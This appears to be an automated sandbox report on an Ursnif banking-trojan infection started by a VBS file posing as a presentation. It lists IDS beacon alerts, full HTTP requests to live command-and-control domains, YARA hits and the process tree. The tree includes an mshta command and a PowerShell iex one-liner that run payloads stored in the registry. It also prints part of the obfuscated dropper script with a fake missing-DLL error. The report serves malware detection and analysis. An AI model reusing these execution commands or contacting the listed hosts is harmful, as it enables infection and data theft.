Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp |
Source: | Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80 |
Source: global traffic | HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at |
Source: global traffic | HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m- |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2274 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7E30 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC725F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC1754 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E63570 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E490A1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45C88 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4FBA9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E543B9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E57B5D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5DAED |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB948 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB230 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA70C8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C990FC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB88B8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91000 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA7820 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA9F8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6944 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE95C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4150 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1164 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5164 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA0124 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C92138 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C99AD8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CABA74 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C9ABDC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4BA0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA3A4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91348 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA8340 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4354 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C94B60 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB730C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAD328 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4484 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C974A4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB9408 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB3400 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4DE0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1DF4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA559C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA5DBC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA9500 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA2EC0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAC6C4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5ED8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB2EF8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C976F4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6684 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB6EA0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB06B4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C93610 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA790 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAF7B4 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1B4A NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2495 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7666 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC8055 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A8F7 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5F7F5 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50FBD memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF36B NtProtectVirtualMemory, |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs' |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume 